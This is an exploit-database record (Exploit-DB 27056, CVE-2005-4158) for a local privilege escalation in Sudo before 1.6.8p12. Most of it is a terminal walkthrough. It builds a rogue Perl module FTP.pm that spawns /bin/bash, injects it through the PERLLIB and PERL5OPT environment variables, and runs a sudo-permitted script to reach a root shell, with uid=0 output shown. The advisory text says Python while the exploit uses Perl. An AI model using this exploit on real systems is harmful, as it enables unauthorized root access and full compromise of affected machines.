{"id": "EDB-ID:27056", "vendorId": null, "type": "exploitdb", "bulletinFamily": "exploit", "title": "Sudo 1.6.x - Environment Variable Handling Security Bypass (1)", "description": "", "published": "2006-01-09T00:00:00", "modified": "2006-01-09T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "cvss2": {}, "cvss3": {}, "href": "https://www.exploit-db.com/exploits/27056", "reporter": "Breno Silva Pinto", "references": [], "cvelist": ["2005-4158"], "immutableFields": [], "lastseen": "2022-08-16T02:36:39", "viewCount": 15, "enchantments": {"dependencies": {}, "score": {"value": 0.2, "vector": "NONE"}, "backreferences": {}, "exploitation": null, "vulnersScore": 0.2}, "_state": {"dependencies": 1661190352, "score": 1661184847}, "_internal": {"score_hash": "efc32c3547b259c31aad6ab5fe1ab21a"}, "sourceHref": "https://www.exploit-db.com/download/27056", "sourceData": "source: https://www.securityfocus.com/bid/16184/info\r\n\r\nSudo is prone to a security-bypass vulnerability that could lead to arbitrary code execution. This issue is due to an error in the application when handling environment variables.\r\n\r\nA local attacker with the ability to run Python scripts can exploit this vulnerability to gain access to an interactive Python prompt. That attacker may then execute arbitrary code with elevated privileges, facilitating the complete compromise of affected computers.\r\n\r\nAn attacker must have the ability to run Python scripts through Sudo to exploit this vulnerability.\r\n\r\nThis issue is similar to BID 15394 (Sudo Perl Environment Variable Handling Security Bypass Vulnerability). \r\n\r\n## Sudo local root exploit ##\r\n## vuln versions : sudo < 1.6.8p12\r\n## adv : https://www.securityfocus.com/bid/15394\r\n## adv : http://www.frsirt.com/bulletins/2642\r\n\r\n##by breno - breno@kalangolinux.org\r\n\r\n## You need execute access to perl script in sudo ##\r\n\r\n## cat /etc/sudoers ##\r\n\r\nbreno ALL=(ALL) /home/breno/code.pl\r\n\r\n## Now let's create your own perl module FTP.pm :) good name.\r\n\r\nbreno ~ $ -> mkdir modules\r\nbreno ~ $ -> mkdir FTP\r\nbreno ~/modules $ -> ls\r\nFTP\r\nbreno ~/modules $ -> cd FTP\r\nbreno ~/modules/FTP $ -> h2xs -AXc -n FTP\r\nDefaulting to backwards compatibility with perl 5.8.7\r\nIf you intend this module to be compatible with earlier perl versions, please\r\nspecify a minimum perl version with the -b option.\r\n\r\nWriting FTP/lib/FTP.pm\r\nWriting FTP/Makefile.PL\r\nWriting FTP/README\r\nWriting FTP/t/FTP.t\r\nWriting FTP/Changes\r\nWriting FTP/MANIFEST\r\nbreno ~/modules/FTP $ ->\r\n\r\nbreno ~/modules/FTP/FTP $ -> perl Makefile.PL\r\nChecking if your kit is complete...\r\nLooks good\r\nWriting Makefile for FTP\r\nbreno ~/modules/FTP/FTP $ -> make\r\ncp lib/FTP.pm blib/lib/FTP.pm\r\nManifying blib/man3/FTP.3pm\r\nbreno ~/modules/FTP/FTP $ -> make test\r\nPERL_DL_NONLAZY=1 /usr/bin/perl \"-MExtUtils::Command::MM\" \"-e\" \"test_harness(0,\r\n'blib/lib', 'blib/arch')\" t/*.t\r\nt/FTP....ok\r\nAll tests successful.\r\nFiles=1, Tests=1, 0 wallclock secs ( 0.03 cusr + 0.01 csys = 0.04 CPU)\r\nbreno ~/modules/FTP/FTP $ ->\r\n\r\n#Now i deleted the default FTP.pm (it was ugly), and create my beautiful module\r\n\r\nbreno ~/modules/FTP/FTP/blib/lib $ -> vi FTP.pm\r\n\r\npackage FTP;\r\n\r\nuse strict;\r\nuse vars qw($VERSION);\r\n$VERSION = '0.01';\r\n\r\nsub new {\r\n my $package = shift;\r\n return bless({}, $package);\r\n}\r\n\r\nsub verbose {\r\n my $self = shift;\r\n system(\"/bin/bash\");\r\n if (@_) {\r\n $self->{'verbose'} = shift;\r\n }\r\n return $self->{'verbose'};\r\n}\r\n\r\nsub hoot {\r\n my $self = shift;\r\n return \"Don't pollute!\" if $self->{'verbose'};\r\n return;\r\n}\r\n\r\n1;\r\n__END__\r\n\r\nEOF\r\n\r\n# Remenber our super code.pl\r\n\r\nbreno ~ $ -> vi code.pl\r\n\r\n#!/usr/bin/perl\r\n\r\nBEGIN { $| = 1; print \"1..1\\n\"; }\r\nEND {print \"not ok 1\\n\" unless $loaded;}\r\nuse FTP;\r\n$loaded = 1;\r\nprint \"ok 1\\n\";\r\n\r\nmy $obj = new FTP;\r\n$obj->verbose(1);\r\nmy $result = $obj->hoot;\r\nprint ($result eq \"Don't pollute!\" ? \"ok 2\\n\" : \"not ok 2\\n\");\r\n\r\n$obj->verbose(0);\r\nmy $result = $obj->hoot;\r\nprint ($result eq \"\" ? \"ok 3\\n\" : \"not ok 3\\n\");\r\n\r\n\r\nEOF\r\n\r\n\r\n# Now let's play with PERLLIB and PERL5OPT env.\r\n\r\nbreno ~ $ -> export PERLLIB=\"/home/breno/modules/FTP/FTP/blib/lib/\"\r\nbreno ~ $ -> export PERL5OPT=\"-MFTP\"\r\n\r\n# Now get Root!! :)\r\n\r\nbreno ~ $ -> sudo ./code.pl\r\nPassword:\r\n1..1\r\nok 1\r\nroot ~ # -> id\r\nuid=0(root) gid=0(root) grupos=0(root)\r\nroot ~ # ->", "osvdbidlist": ["20764"], "exploitType": "local", "verified": true}
{}
Sudo 1.6.x - Environment Variable Handling Security Bypass (1)